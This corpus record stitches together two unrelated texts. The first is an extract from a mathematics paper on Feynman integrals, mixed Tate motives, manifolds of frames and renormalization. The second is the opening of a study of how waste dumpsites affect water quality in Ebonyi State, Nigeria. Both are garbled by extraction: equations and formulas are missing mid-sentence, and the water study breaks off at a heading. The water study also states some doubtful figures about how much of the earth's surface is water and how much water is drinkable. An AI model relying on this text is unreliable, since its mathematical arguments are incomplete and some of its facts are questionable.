Thus, for every Γ satisfying the conditions recalled at the beginning of the section (for example, every 3-edge connected planar graph, or every graph obtained from one of these by adding looping edges or subdividing edges), the nature of period appearing as a Feynman integral over Γ in the sense explained in §2 is controlled by the motive for a normal crossing divisorΣ Γ ⊂ A ℓ 2 consisting of a subset of components of the fixed (for given ℓ and g) normal crossing divisorΣ ℓ,g ⊂ A ℓ 2 introduced above. More explicitly, the boundary of the topological simplex σ n , that is, the domain of integration of the Feynman integral in Lemma 2.3, satisfies Thus, the main goal here will be to understand the motivic nature of the complement SinceΣ Γ consists of components from the fixed normal crossing divisorΣ ℓ,g , this question will be recast in terms that only depend on ℓ and g: we show in Corollary 5.4 below that, using the inclusion-exclusion principle applied to the components ofΣ ℓ,g , it is possible to answer these questions simultaneously for all the divisorsΣ Γ , for all graphs with ℓ loops and genus g, by investigating the nature of a motive constructed out of the intersections of the components of the divisorΣ ℓ,g .
There are general and explicit conditions (see [18], Proposition 3.6) implying that the relative cohomology of a pair (X, Y ) comes from a mixed Tate motive m(X, Y ) (see also [19] for a concrete application to the geometric case of moduli spaces of curves). In general, these rely on assumptions on the divisors involved and their associated stratification, which may not directly apply to the cases considered here. We discuss here a direct approach to constructing stratifications of our lociΣ ℓ,g (D ℓ ∩Σ ℓ,g ) that can be used to investigate the nature of the motive (5.3).
5.2.
Inclusion-exclusion. The procedure we follow will be the one outlined above, based on the divisorsΣ ℓ,g and the inclusion-exclusion principle. Since we already know by the results of §4 that the complement X = A ℓ 2 D ℓ is a mixed Tate motive, we aim at providing a direct argument showing that Y =Σ Γ (Σ Γ ∩D ℓ ) also is a mixed Tate motive. The same argument used in §4 based on the distinguished triangles in the Voevodsky triangulated category of mixed Tate motives [33] would then show that the relative cohomology of the pair (X, Y ) comes from an object m(X, Y ) ∈ Obj(DMT Q ).
As a first step we transform the problem of a complement in a union of linear spaces into an equivalent formulation in terms of intersections of linear spaces, using inclusionexclusion. For a collection {Z i } i∈I of varieties Z i we set This is a disjoint union. We then have the following result. Lemma 5.3. Let Z 1 , . . . , Z m be varieties; assume that the intersections ∩ i∈I Z i are mixed Tate, for all nonempty I ⊆ {1, . . . , m}. Then Z 1 ∪ · · · ∪ Z m is mixed Tate.
Proof. We want to show that Z • I is mixed Tate for all nonempty I ⊆ {1, . . . , m}. To see this, notice that it is true by hypothesis for I = {1, . . . , m}, since in this case Z • I = ∩ i∈I Z i . Thus, it suffices to prove that if it is true for all I with |I| > k, then it is true for all I with |I| = k (provided k ≥ 1). Recall that, as we already used in §4 above, the distinguished triangles in the Voevodsky category of mixed Tate motives imply that, if X ֒→ Y is a closed embedding, and U = Y X the complement, then if any two of X, Y, U are mixed Tate so is the third as well. The result then follows from the combined use of this property, the hypothesis, and the identity , we conclude that the union Z 1 ∪ · · · ∪ Z m is mixed Tate, again by the property of mixed Tate motives mentioned above. Now, we have observed that for every graph Γ with ℓ loops and genus g (and satisfying the condition specified at the beginning of the section) the divisorΣ Γ consists of components of the divisorΣ ℓ,g . Therefore, the strata ofΣ Γ are unions of strata fromΣ ℓ,g . We can then reformulate our main problem as follows.
Corollary 5.4. Let, as above,Σ ℓ,g = X 1 ∪ · · · ∪ X N and letΣ Γ be the divisors constructed out of subsets of components ofΣ ℓ,g , associated to the individual graphs. Then, for all graphs Γ with ℓ loops and genus g, the complementΣ Γ (D ℓ ∩Σ Γ ) is mixed Tate if the locus Proof. This is a direct consequence of Lemma 5.3.
Corollary 5.4 encapsulates the main reformulation of our problem, mentioned at the end of §1: the target becomes that of proving that the loci (∩ i∈I X i ) D ℓ determined by the normal crossing divisorΣ ℓ,g are mixed Tate. This result shows that, although in principle one is working with a different divisorΣ Γ for each graph Γ, in fact it suffices to consider the divisorΣ ℓ,g , for fixed number of loops ℓ and genus g. It is conceivable that the loci associated to a specific graph (that is, to a specific choice of components ofΣ ℓ,g ) may be mixed Tate while the loci corresponding to the whole divisorΣ ℓ,g is not. As we are seeking an explanation that would imply that all periods arising from Feynman integrals are periods of mixed Tate motives, we will optimistically venture that all loci (∩ i∈I X i ) D ℓ may in fact turn out to be mixed Tate, for all ℓ and for g = 0: by Corollary 5.4, it would follow that all complementsΣ Γ (D ℓ ∩Σ Γ ) are mixed Tate, for all graphs Γ (satisfying our running combinatorial hypothesis). Our task is now to formulate this working hypothesis as a more concrete problem. The intersection ∩ i∈I X i is a linear subspace of codimension |I| in A ℓ 2 ; in general, the intersection of a linear subspace with the determinant is not mixed Tate (for example, the intersection of a general A 3 withD 3 is a cone over a genus-1 curve). Thus, we have to understand in what sense the intersections ∩ i∈I X i appearing in Corollary 5.4 are special; the following lemma determines some key features of these subspaces. Proof. Recall (Proposition 5.2) that the components X k ofΣ ℓ,g consist of matrices for which either the (i, j) entry x ij equals 0, for 1 ≤ i < j ≤ ℓ − 2g, or x i1 + · · · + x i,ℓ−2g = 0 for 1 ≤ i ≤ ℓ − 2g. Thus, each X k consists of ℓ-tuples (v 1 , . . . , v ℓ ) for which exactly one row v i belongs to a fixed hyperplane of E, and more precisely to one of the hyperplanes (5.9) x 1 + · · · + x ℓ−2g = 0 , x 2 = 0 , · · · , x ℓ−2g = 0 (with evident notation). The statement follows by choosing V i to be the intersection of the hyperplanes corresponding to the X k in row i, among those listed in (5.9). Since there are at most ℓ − 2g − i + 1 hyperplanes X k in the i-th row, Finally, to obtain the basis (e 1 , . . . , e ℓ ) mentioned in the statement, simply choose the basis dual to the basis (x 1 + · · · + x ℓ−2g , x 2 , . . . , x ℓ ) of the dual space to E.
The main questions.
In view of Lemma 5.5, for any choice V 1 , . . . , V ℓ of subspaces of an ℓ-dimensional space E, let denote the complement of the determinant hypersurface in the set of matrices determined by V 1 , . . . , V ℓ . An optimistic version of the question we are led to is: Question I ℓ . Let V 1 , . . . , V ℓ be subspaces of an ℓ-dimensional vector space. Is the locus F(V 1 , . . . , V ℓ ) mixed Tate? By Corollary 5.4 and Lemma 5.5, an affirmative answer to Question I ℓ implies that the complementΣ Γ (D ℓ ∩Σ Γ ) is mixed Tate for all graphs Γ with ℓ loops and satisfying the combinatorial condition given at the beginning of this section. Modulo divergence issues, this would imply that all Feynman integrals corresponding to these graphs are periods of mixed Tate motives. We will give an affirmative answer to Question I ℓ for ℓ ≤ 3, in §6.
As Lemma 5.5 is in fact more precise, the same conclusion would be reached by answering affirmatively the following weak version of Question I ℓ : Question II ℓ . Let (e 1 , . . . , e ℓ ) be a basis of an ℓ-dimensional vector space. For i = 1, . . . , ℓ, let V i be a subspace spanned by a choice of ≥ i − 1 basis vectors. Is F(V 1 , . . . , V ℓ ) mixed Tate?
Notice that, when V k = E for all k, both questions reproduce the statement about the hypersurface complement A ℓ 2 D ℓ proved in §4.1. One might expect that a similar inductive procedure would provide a simple approach to these questions. It is natural to consider the following apparent refinement of Question I ℓ for 1 ≤ r ≤ ℓ (and we could similarly consider an analogous refinement Question II ′ ℓ,r of Question II ℓ ): Question I ′ ℓ,r . In a vector space E of dimension ℓ, and for any choice of subspaces Is the locus F ℓ (V 1 , . . . , V r ) mixed Tate?
Question I ℓ is then the same as Question I ′ ℓ,ℓ ; and Question I ′ ℓ,r is obtained by taking V r+1 = · · · = V ℓ = E in Question I ℓ : thus, answering Question I ℓ is equivalent to answering Question I ′ ℓ,r for all r ≤ ℓ. Now, for all ℓ, the case r = 1 is immediate: F ℓ (V 1 ) consists of all nonzero vectors in V 1 , which is trivially mixed Tate. One could then hope that an inductive procedure may yield a method for increasing r. This is carried out in §6 for r = 2 and r = 3 (in particular, we give an affirmative answer to Question I ℓ for ℓ ≤ 3); but this approach quickly leads to the analysis of several different cases, with an increase in complexity that makes further progress along these lines seem unlikely. The main problem is that once all tuples (v 1 , . . . , v k ) of linearly independent vectors such that v i ∈ V i have been constructed, controlling dim(V k+1 ∩ v 1 , . . . , v k ) requires consideration of a range of possibilities that depend on the position of the vectors v i and their spans vis-a-vis the position of the next space V k+1 . The number of these possibilities increases rapidly. A similar approach to the simpler (but sufficient for our purposes) Question II does not appear to circumvent this problem.
There are special cases where an inductive argument works nicely. We mention two here.
• Suppose that all the V k in (5.10) are hyperplanes in E. Then F(V 1 , . . . , V ℓ ) is mixed Tate.
In this case, following the inductive argument mentioned above, the only possibilities for V k+1 ∩ v 1 , . . . , v k are v 1 , . . . , v k , and a hyperplane in v 1 , . . . , v k . The first occurs This locus is under control, since it amounts to doing the whole construction in V k rather than E, i.e. one can argue by induction on the dimension of E. Thus, this locus is mixed Tate. The other case gives a locus that is the complement of this mixed Tate variety in another mixed Tate variety, hence, by the same argument about closed embeddings and distinguished triangles used in §4, it is also mixed Tate.
A reformulation.
For given subspaces V i ⊂ E, the inductive approach suggested by Question I ′ ℓ,r aims at constructing the set of ℓ-uples (v 1 , . . . , v ℓ ) with the two properties (1) v i ∈ V i ; (2) dim v 1 , . . . , v r = r, for all r, and proving inductively that these loci are mixed Tate, in order to show that the loci (5.10) are mixed Tate. By (2), the sets An affirmative answer to this question (for all choices of d i , e i ) would give an affirmative answer to our main Question I ℓ . Indeed, the locus F(V 1 , . . . , V ℓ ) is a fibration on the locus Flag ℓ,{di,ei} ({V i }) determined in Question III ℓ . Concretely, the procedure constructing the tuples (v 1 , . . . , v ℓ ) in F(V 1 , . . . , V ℓ ) over a flag E • in this locus is: • etc. The class of F(V 1 , . . . , V ℓ ) in the Grothendieck group would then be computed as a sum of terms The set of flags E • satisfying conditions analogous to those specified in Question III ℓ with respect to all terms of a fixed flat E ′ • (that is: with prescribed dim(E i ∩ E ′ j ) for all i and j) is a cell of the corresponding Schubert variety in the flag manifold.
It follows that Flag ℓ,{di,ei} ({V i }) is a disjoint union of cells, and thus certainly mixed Tate, if the V i 's form a complete flag. This gives a high-brow alternative viewpoint for the last case mentioned in §5.3.
By the same token, the set of flags E • for which dim E i ∩ F is a fixed constant is a union of Schubert cells in the flag manifold, for all subspaces F . It follows that the locus Flag ℓ,{di,ei} ({V i }) of Question III ℓ is an intersection of unions of Schubert cells in the flag manifold. Such loci were studied e.g. in [16], [17], [30], [31].
Motives and manifolds of frames
The manifolds of r-frames in a given vector space are defined as follows.
Definition 6.1. Let F(V 1 , . . . , V r ) ⊂ V 1 × · · · × V r denote the locus of r-tuples of linearly independent vectors in a vector space, where each v i is constrained to belong to the given subspace V i .
These are the loci appearing in Question I ′ ℓ,r ; we now omit the explicit mention of the dimension ℓ of the ambient space. The question we consider here is the one formulated in §5.3, namely to establish when the motive of the manifold of frames F(V 1 , . . . , V r ) is mixed Tate. A possible strategy to answering this question is based on the following simple observations. Lemma 6.2. Let V 1 , . . . , V r be subspaces of a given vector space V . Let v r ∈ V r , and let π : V → V ′ := V / v r be the natural projection. Let v 1 , . . . , v r−1 be vectors such that v i ∈ V i , and π(v 1 ), . . . , π(v r−1 ) are linearly independent. Then v 1 , . . . , v r are linearly independent.
A second equally elementary remark is that for a given v ′ = 0 in the quotient V / v r , and letting as above π denote the projection V This implies the following. Lemma 6.3. Suppose given a stratification {S α } of V r with the properties that • {S α } is finer than the stratification induced on V r by the subspace arrangement V 1 ∩ V r , . . . , V r−1 ∩ V r , hence the number s α of spaces V i (1 ≤ i < r) containing a vector v r ∈ S α is independent of the vector and only depends on α. • For v r ∈ S α , the class F α := [F(π(V 1 ), . . . , π(V r−1 ))] also depends only on α, and not on the chosen vector v r ∈ S α . Then the class in the Grothendieck group satisfies Proof. Indeed, by Lemma 6.2 every frame in the quotient will determine frames in V , and by the observation following the Lemma, there is a whole k sα of frames over a given one in the quotient.
In an inductive argument, the loci [F α ] could be assumed to be mixed Tate, and (6.1) would provide a strong indication that [F(V 1 , . . . , V r )] is then mixed Tate as well. We focus here on giving statements at the level of classes in the Grothendieck ring, for simplicity, though these same arguments, based on constructing explicit stratifications, can be also used to derive conclusion on the motives at the level of the derived category of mixed motives in a way similar to what we did in the case of the complement of the determinant hypersurface in §4 above.
The main question is then reduced to finding conditions under which a stratification of the type described here exists. We see explicitly how the argument goes in the simplest cases of two and three subspaces. As we discuss below, the case of three subspaces is already more involved and exhibits some of the features one is bound to encounter, with a more complicated combinatorics, in the more general cases.
6.1. The case of two subspaces. Let V 1 , V 2 be subspaces of a vector space V . We want to parametrize all pairs of vectors (v 1 , v 2 ) such that v 1 ∈ V 1 , v 2 ∈ V 2 , and dim v 1 , v 2 = 2. This locus can be decomposed into two pieces (which may be empty), defined by the following prescriptions: It is clear that each of these two recipes produces linearly independent vectors, and that (1) and (2) exhaust the ways in which this can be done. So F(V 1 , V 2 ) is the union of the corresponding loci. Pairs (v 1 , v 2 ) as in (1) range over the locus (V 1 (V 1 ∩V 2 ))×(V 2 {0}), which is clearly mixed Tate. As for (2), realize it as follows: • Consider the projective space P(V 1 ∩ V 2 ), and the trivial bundles It is clear that this description also produces a mixed Tate motive.
Note that the prescriptions given as (1) and (2) suffice to compute the class in the Grothendieck group.
Notice that the expression for [F(V 1 , V 2 )] is symmetric in V 1 and V 2 , though the two individual contributions (1) and (2) are not. Of course a more symmetric description of the locus can be obtained by subdividing it into four cases according to whether v 1 , v 2 are or are not in V 1 ∩ V 2 .
6.2. The case of three subspaces. We are given three subspaces V 1 , V 2 , V 3 of a vector space, and we want to parametrize all triples of linearly independent vectors (v 1 , v 2 , v 3 ) with v i ∈ V i . As above, d i will stand for the dimension of V i , and d ij for dim ( Notice that now the information on the dimension D is also needed and does not follow from the other data. This can be seen easily by thinking of the cases of three distinct lines spanning a 3-dimensional vector space or of three distinct coplanar lines. These configurations only differ in the number D, yet the set of linearly independent triples is nonempty in the first case, empty in the second. We proceed as follows. Given a choice of v 3 ∈ V 3 , consider the projection π : V → V ′ := V / v 3 ; in V ′ we have the images π(V 1 ), π(V 2 ), to which we can apply the case r = 2 analyzed above. As we have seen, Thus, we need a stratification of V 3 such that, for v 3 ∈ V 3 and denoting as above by π the projection V → V / v 3 , the dimensions of the spaces are constant along strata.
Lemma 6.5. The following 5 loci give a stratification of V 3 {0} with the properties of Lemma 6.3. (1) It follows easily that the three numbers dim π(V 1 ), dim π(V 2 ), dim(π(V 1 ∩V 2 )) are constant along the strata. More explicitly one has the following data.
For example, in the fourth (and most interesting) case, dim π(V 1 ) = d 1 and dim π( Lemma 6.4 converts this information into the list of the classes [F α ] and one obtains the following list of cases. The number s α is immediately read off the geometry. The last ingredient consists of the class [S α ], which is also essentially immediate. The only item that deserves attention is the dimension of (V 1 + V 2 ) ∩ V 3 . This is and as dim( With this understood one obtains the following list of cases.
This completes the proof.
We can now apply equation (6.1), and this gives the following result.
Lemma 6.6. The class of F(V 1 , V 2 , V 3 ) in the Grothendieck group is of the form Notice once again that the expression (6.3) is symmetric in V 1 , V 2 , V 3 , unlike the contributions of the individual strata. Slightly more refined considerations, in the style of those sketched in §6.1, prove that [F(V 1 , V 2 , V 3 )] is in fact mixed Tate.
In principle, the procedure applied here should work for a larger number of subspaces: the main task amounts to the determination of a stratification of the last subspace satisfying the properties given in Lemma 6.3. This is bound to be rather challenging for r ≥ 4: already for r = 4 one can produce examples for which the closures of the strata are not linear subspaces. This is in fact the case already for V 1 , . . . , V 3 planes in general position in a 4-dimensional ambient space E: the unique quadric cone containing V 1 , V 2 , V 3 is the closure of a stratum in a stratification of V 4 = E satisfying the properties listed in Lemma 6.3. 6.3. Graphs with three loops. One can apply the formula of Lemma 6.6 to compute explicitly the motive (as a class in the Grothendieck group) for the locus of intersection of the divisor with normal crossingsΣ ℓ,g of (5.1) with the complement of the determinant hypersurface, in the case of (planar) graphs with three loops.
As pointed out in the discussion following Corollary 5.4, studyingΣ 3,0 suffices in order to get analogous information forΣ Γ for every graph with three loops and satisfying the condition specified at the beginning of §5 (guaranteeing that the corresponding map τ is injective). The divisorΣ 3,0 is the divisor corresponding to the "wheel with three spokes" graph (the skeleton of the tetrahedron). This graph has matrix M Γ (t) given by Here, t 1 , . . . , t 6 are variables associated with the six edges of the graph, labeled as in Figure 6.
Choose the internal faces with counterclockwise orientation as the basis of loops. Then any orientation for the edges leads to the matrix displayed above. Labeling entries of the matrix as x ij , we can obtain t 1 , . . . , t 6 as pull-backs of the following: Thus, we are considering the divisorΣ 3,0 with normal crossings given by the equation We want to obtain an explicit description, as a class in the Grothendieck group, of the intersection of this locus with the complement of determinant hypersurfaceD 3 in A 9 . By inclusion-exclusion (cf. §5.2) this can be done by carrying out the computation for all intersections of subsets of the components of this divisor. Since there are 6 components, there are 2 6 = 64 such intersections.
Each of these possibilities determines a triple of subspaces V 1 , V 2 , V 3 inside the ambient A 9 (cf. Lemma 5.5), corresponding to linearly independent vectors v 1 , v 2 , v 3 , i.e. the rows of the matrix x ij , parameterizing points in the complement of the determinant.
Thus, to begin with, one computes for each of these cases the corresponding class [F(V 1 , V 2 , V 3 )] using Lemma 6.6.
Note that each of these classes is necessarily a multiple of (L − 1) 3 : indeed, once the directions of v 1 , v 2 , v 3 are specified, the set of vectors with those directions forms a (C * ) 3 . We list the classes here, divided by this constant factor (L − 1) 3 . Each class is marked according to the components ofΣ 3,0 containing the corresponding locus: for example, • • • • • • corresponds to the complement ofD 3 in the intersection of X 1 ∩ X 2 ∩ X 6 , where X i pulls back to t i via τ as above (thus, X 1 ∩ X 2 ∩ X 6 has equations x 12 = x 13 = x 31 + x 32 + x 33 = 0).
Next, one applies inclusion-exclusion to go from the class [F(V 1 , V 2 , V 3 )] as above,which correspond to the complement of the determinant in subspaces obtained as intersections of the 6 divisors, to classes corresponding to the complement of the determinant in the complement of smaller subspaces in a given subspace. This produces the following list of classes in the Grothendieck group; in this table, the classes do include the common factor (L − 1) 3 .
It is interesting to notice that the expressions simplify when one takes inclusionexclusion into account. The cancellations due to inclusion-exclusion mostly lead to classes of the form L a (L − 1) b .
In terms of Feynman integrals, in the case of the wheel with three spokes, we are interested in the relative cohomology The hypersurface complement A 9 D 3 has class is the whole space (these are all the strata ofΣ 3,0 (D 3 ∩Σ 3,0 )) or, equivalently, the difference of (6.5) and the last item • • • • • •. This gives The main information is carried by the class • • • • • •, In the case of other 3-loop graphs Γ, such as the one illustrated in Figure 7, the divisor Σ Γ is a union of components ofΣ 3,0 (cf. Proposition 5.2). The class of the locusΣ Γ (D 3 ∩Σ 3,0 ) may be obtained by adding up all contributions listed above, for the strata contained inΣ Γ . For the example given in Figure 7, these are the strata contained in the divisors X 1 , . . . , X 5 ; the corresponding classes are those marked by * * * * * * , where at least one of the first five * is •; or, equivalently, the difference of (6.5) and the classes marked
Divergences and renormalization
Our analysis in the previous sections of this paper concentrated on the task of showing that a certain relative cohomology is a realization of a mixed Tate motive m(X, Y ), where the loci X and Y are constructed, respectively, as the complement of the determinant hypersurface and the intersection with this complement of a normal crossing divisor that contains the image of the boundary of the domain of integration σ n under the map τ Γ , for any graph Γ with fixed number of loops and fixed genus. Knowing that m(X, Y ) is a mixed Tate motive implies that, when convergent, the parametric Feynman integral for all such graphs is a period of a mixed Tate motive. This, however, does not take into account the presence of divergences in the Feynman integrals.
There are several different approaches to regularize and renormalize the divergent integrals. We outline here some of the possibilities and comment on how they can be made compatible with our approach. 7.1. Blowups. One possible approach to dealing with divergences coming from the intersections of the divisor Σ n with the graph hypersurface X Γ is the one proposed by Bloch-Esnault-Kreimer in [10], namely one can proceed to perform a series of blowups of strata of this intersection until one has separated the domain of integration from the hypersurface and in this way regularized the integral.
In our setting, a similar approach should be reformulated in the ambient A ℓ 2 and in terms of the intersection of the determinant hypersurfaceD ℓ with the divisorΣ ℓ,g . If the main question posed in §5. 3 has an affirmative answer, then this intersection admits a stratification by mixed Tate nonsingular loci. It seems likely that a suitable sequence of blow-ups would then have the effect of regularizing the integral, while at the same time maintaining the motivic nature of the relevant loci unaltered. We intend to return to a more detailed analysis of this approach in future work. 7.2. Dimensional regularization and L-functions. Belkale and Brosnan showed in [4] that dimensionally regularized Feynman integrals can be written in the form of a local Igusa L-function, where the coefficients of the Laurent series expansion are periods, provided the integrals describing them are convergent. Such periods have an explicit description in terms of integrals on simplices σ n and cubes [0, 1] r of algebraic differental forms for f (t) = Ψ Γ (t) the graph polynomial. The nature of such integrals as periods would still be controlled by the same motivic loci that are involved in the original parametric Feynman integral before dimensional regularization. The result of [4] is formulated only for the case of log-divergent integrals where only the graph polynomial Ψ Γ (t) is present in the Feynman parametric form and not the polynomial P Γ (t, p). The result was extended to the more general non-log-divergent case by Bogner and Weinzierl in [12]. In this approach, if there are singularities in the integrals that compute the coeffients of the Laurent series expansion of the local Igusa L-function giving the dimensionally regularized Feynman integral, these can be treated by an algorithmic procedure developed by Bogner and Weinzierl in [13] (see also the short survey [14]). The algorithm is designed to split the divergent integral into sectors where a change of variable that introduces a blowup at the origin isolates the divergence as a pole in a parameter 1/ǫ. One can then do a subtraction of this polar part in the Laurent series expansion in the variable ǫ and eliminate the divergence. The iteration part of the algorithm is based on Hironaka's polyhedral game and it is shown in [13] that the resulting algorithm terminates in finite time.
If one uses this approach in our context one will have to show that the changes of variables introduced in the process of evaluating the integrals in sectors do not alter the motivic nature of the loci involved.
7.3.
Deformations. An alternative to the use of blowups is the use of deformations. We discuss here the simplest possible procedure one can think of that uses deformations of the graph hypersurface (or of the determinant hypersurface). It is not the most satisfactory deformation method, because it does not lead immediately to a "minimal subtraction" procedure, but it suffices here to illustrate the idea.
Again, for our purposes, we can assume to work in the "stable range" where D is sufficiently large so that both α and β are positive. The case of small D, which is of direct physics interest, leads one to the different problem of considering the hypersurfaces defined by P Γ (t, p), as a function of the external momenta p and the singularities produced by the intersections of these with the domain of integration. This type of analysis can be found in the physics literature, for instance in [32]. See also [7], §18. Assuming to work in the range where α and β are positive, one can choose to regularize the integral (7.1) by introducing a deformation parameter ǫ ∈ C R + and replaing (7.1) with the deformed This has the effect of replacing, as locus of the singularities of the integrand, the graph hypersurfaceX Γ = {Ψ Γ (t) = 0}, with the level setX Γ,ǫ = {Ψ Γ (t) = ǫ} of the map Ψ Γ : A n → A. For a choice of ǫ in the cut plane C R + , the hypersurfaceX Γ,ǫ does not intersect the domain of integration σ n . In fact, for t i ≥ 0 one has Ψ Γ (t) ≥ 0. This choice has therefore the effect of desingularizing the integral. The resulting function of ǫ extends holomorphically to a function on C I, where I ⊂ R + is the bounded interval of values of Ψ Γ on σ n .
When we transform the parametric integral using the map τ Γ into an integral of a form defined on the complement of the determinant hypersurfaceD ℓ in A ℓ 2 on a domain of integration τ Γ (σ n ) with boundary on the divisorΣ ℓ,g , we can similarly separate the divisor from the hypersurface by the same deformation, where instead of the locusD ℓ = {det(x) = 0} one considers the level setD ℓ,ǫ = {det(x) = ǫ}, so thatD ℓ,ǫ does not intersect τ Γ (σ n ). The nature of the period described by the deformed integral is then controlled by the motive m(X ǫ , Y ǫ ) for X ǫ = A ℓ 2 D ℓ,ǫ and Y ǫ =Σ ℓ,g (D ℓ,ǫ ∩Σ ℓ,g ). The question becomes then whether the motivic nature of m(X, Y ) with X = X 0 and Y = Y 0 and m(X ǫ , Y ǫ ) is the same. This in general is not the case, as one can easily construct examples of fibrations where the generic fiber is not a mixed Tate motive while the special one is. However, in this setting one is dealing with a very special case, where the deformed varietyD ℓ,ǫ is given by matrices of fixed determinant. Up to a rescaling, one can check that the fiberD ℓ,1 = SL n is indeed a mixed Tate motive, from the general results of Biglari [5], [6] on reductive groups. Thus, over a set of algebraic values of ǫ one does not leave the world of mixed Tate motives. This will give a statement on the nature of the regularized Feynman integrals as a period of a mixed Tate motive m(X ǫ , Y ǫ ) and reduces then the problem to that of removing the divergence as ǫ → 0, in such a way that what remains is a convergent integral whose nature as a period is controlled by the original motive m(X, Y ).
A different approach to the regularization of parametric Feynman integrals using deformations was discussed in [25] in terms of Leray cocycles and a related regularization procedure. | 2009-01-14T20:39:23.000Z | 2009-01-14T00:00:00.000 | {
"year": 2009,
"sha1": "fa0f1cbdc0393dba02f86c42f74982073836fccd",
"oa_license": null,
"oa_url": "https://www.intlpress.com/site/pub/files/_fulltext/journals/atmp/2010/0014/0003/ATMP-2010-0014-0003-a005.pdf",
"oa_status": "BRONZE",
"pdf_src": "Arxiv",
"pdf_hash": "0a75cec15adedb48ac012699047e26992b807e21",
"s2fieldsofstudy": [
"Mathematics"
],
"extfieldsofstudy": [
"Mathematics",
"Physics"
]
} |
267907161 | pes2o/s2orc | v3-fos-license | Effect of waste dumpsite on the surface and groundwater supplies using water quality index in Afikpo south local government area, Ebonyi state
The research examined the effect of waste dumpsite on the surface and groundwater supplies using water quality index (WQI) in Afikpo South Local Government Area of Ebonyi State. Fifteen samples were drawn from fifteen locations. The samples were analyzed using standard methods. The results of the analyses were compared with the World Health Organization (WHO) drinking water standard. The WQI of the water samples were calculated and compared with the classification of water quality status. The results showed that the pH of the water samples ranged 4.6 ± 0.047 – 6.70 ± 0.090, EC 7.26 ± 1.63 – 2450 ±4.32 , Turbidity 0.50 ± 0.082 – 2.00 ± 0.094, TDS 23.10 ± 0.047 - 1830 ± 17.00, Alkalinity 45 ± 0.47 - 2080 ± 4.71, Total Hardness 4 ± 0.47 – 170 ± 0.94, DO 5.07 ± 0.012 – 7.72 ± 0.016, BOD 0.4 ± 0.047 – 12.8 ± 0.082, NO 3-1.14 ± 0.009 – 32.69 ± 0.047 and 0.09 ± 0.00 – 15.6 ± 0.028. The results showed that the pH, Turbidity, Total Hardness, NO 3-were all below the WHO drinking water standard. All the locations of the water samples showed some levels of acidity. Apart from location MB that recorded high levels of TDS and Alkalinity every other location was below the WHO permissible limit of drinking water standard. The results of the analysis also revealed that the WQI value of the water was 57.92 and this was below the critical value of 100. From the findings, all the water samples need to be treated with alkali to reduce the low pH while the water samples generally need to be given comprehensive treatment before usage.
Introduction
Water is the most abundant resource on earth and about 70 percent of the human body and 60 -70 percent of plant cells is made up of water [1].It is very vital for the survival of any form of life.On the average, a human being consumes about 2 litres of water every day.About 80 percent of the earth's surface is covered by water [2].Out of the estimated 1,011 million Km 3 of the total water present on earth, only 33,400 m 3 of water is available for drinking, agriculture, domestic and industrial use.
Availability of water is one of the determinants of human settlement, existence and activities on the earth.Its quality is of all the environmental concerns that developing countries face.The lack of adequate, good quality water remains the most serious [3].
Water, whether from underground or surface sources, found in nature is polluted [4].The pollution of these water sources would render them unwholesome for consumption and may be costly and difficult to treat [5].Pollution could increase as a result of increase in industrialization.On one hand and population explosion which have resulted to rise in demands of water.
Handling of solid waste is a major issue in several countries, especially in developing countries with high population growth [5].In most developing countries, solid wastes are the major input of dumpsites.With respect to the hydrological analysis of groundwater, it flows from areas of higher topography towards areas of lower topography thereby bringing about the examination of the degradable material which form leachate and pollute the groundwater and surface water of the study areas.
Dumpsites is a common practice in developing countries and one of the cheapest methods for organized waste management in many parts of the world [6], [7].Dumpsites pose serious threat to the quality of surface and groundwater if improperly managed and secured [8].This threat to the surface and groundwater could be dangerous and harmful.The level of this threat depends on the composition and quantity of leachate and the distance of a dumpsite from the water source.
In Ebonyi State, Nigeria, the commonest means of disposal of solid wastes, whether urban or rural settings is through dumpsites/landfills.The massive population growth has put pressure on the available dumpsites and landfill which dotted the landscape of these areas.Waste generated from households, markets, schools, farms and industries etc. are deposited to the dumpsites since it is the cheapest form of disposal [9].
Wastes deposited at the dumpsites are subject to erosion onto the surface water or infiltrate into the groundwater.By percolation of water through the waste substances, variety of organic and inorganic substances and microorganisms [10] which are termed leachate permeate through the soil, surface and groundwater in the vicinity of the dumpsites and in turn pollutes both the surface and groundwater with the immediate surroundings in the subsoil [11] through a combination of physical, chemical and microbial processes of the dumpsites.
The aim of this study is to investigate the effects of waste dumpsites on the surface and groundwater supplies using water quality index (WQI) in Local Government Area, Ebonyi State.The study will investigate the physical and chemical water quality parameters to determine if they meet the drinking quality standard of WHO.
Water Quality Index (WQI)
WQI is a technique of rating that provides the composite influence of individual water quality parameter on the overall quality of water for human consumption [12].This is also known as water pollution index and is a number that expresses water quality by aggregating the measurements of water quality parameters such as dissolved oxygen (DO), pH, NO3 -, PO4 3-, NH3, Cl, hardness, metals etc).It is regarded as one of the most effective way to communicate water quality.Water quality is assessed on the basis of calculated water quality indices [12].The water quality index was developed by the [13].The concept of WQI is based on the comparison of the water quality parameter with respective regulatory standards.It is proximity -to -target composite of water quality, adjusted for the density of monitoring stations in each country, with a maximum score of 100.In the classification of water quality status based on water quality index [14], water with WQI in the range of 0 -25 is excellent, between 25 -50 as good, 51 -70 as poor, 76 -100 very poor and above 100 as unsuitable for drinking.Usually the lower score alludes to better water quality (excellent, good) and higher score to degraded quality (bad, poor).
Calculation of Water Quality Index
The standards for drinking purposes as recommended by [15] have been considered for the calculation of WQI.There are three steps for computing WQI.The weighted Arithmetic method [16] was used for the calculation of WQI.Further, quality rating or sub-index (Equation 10) was calculated using the following expression: Where, n = is a number reflecting relative value of this parameter in the polluted water with respect to its standard permissible value Sn Qn = quality rating for the n th water quality parameter Vn = estimated value of the n th parameter at a given water sampling station Sn = standard permissible value of the n th parameter Vi = ideal value of nth parameter in pure water (i.e., 0 for all other parameters except the parameters pH and Dissolve oxygen [7.00 and 14.60 mg/l, respectively]) The unit weight (Equation 11) was calculated by a value inversely proportional to the recommended standard value Sn of the corresponding parameter.
Where Wn = unit weight for nth parameter Sn = standard permissible value for nth parameter K = proportionality constant.
The overall WQI (Equation 12) is calculated by the following equation The investigation will include the heavy metals in the water sources.The water quality index mode will be used to quantify and evaluate the quality of the water [6] Table 1.Various statistical packages will be deployed in this work.
The Study Area
The The main occupation of the people is largely farming.Edda Local Government Area is richly blessed with large mineral deposits such as: lead, zinc, copper, gypsum, coal, crude oil and gas, as well as kaolin, laterite and igneous rocks [18].
Sample Locations and Codes
